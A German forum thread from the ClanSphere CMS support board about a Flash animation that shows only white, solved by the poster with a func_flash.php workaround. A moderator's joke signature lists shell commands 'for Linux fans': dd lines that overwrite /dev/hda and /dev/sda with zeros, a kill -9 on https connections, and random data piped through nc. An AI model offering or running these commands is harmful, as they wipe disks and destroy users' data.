Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 3
Seite [1]
gigasi


Beginner





Beiträge: 14
# Thema - 02.03.2007 um 15:15 Uhr
Hallo ich bin es mal wieder

Ich hatte mal versucht eine Flash Animation auf meiner Seite zu machen (gfx/index.htm) doch leider zeigt er nur weiß an.

Kennt einer das Problem und wie bekomme ich das hin das die Flash Animation gezeigt wird.

ich sage schon mal danke in voraus

Gruß
GiGasi
Inaktiv
h0n1g


Geekboy




Beiträge: 1013
# Antwort: 1 - 02.03.2007 um 15:26 Uhr
öhm, link ?

überprüf mal im quelltest (wenn du die seite aufrufst) die pfadangabe zu deiner animation


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
gigasi
Thread-Ersteller


Beginner





Beiträge: 14
# Antwort: 2 - 02.03.2007 um 15:49 Uhr
Ja darauf habe ich schon geachtet aber jetzt habe ich ein Trick, einfach eine func_flash.php machen und dann {func:flash } in der Haupt Index (gfx/index.htm) Reinmachen


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 3 - 30.03.2007 um 04:20 Uhr
Na wenn das geht, dann sage ich doch endlich mal wieder


./closed


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 3
Seite [1]


Sie müssen sich registrieren, um zu antworten.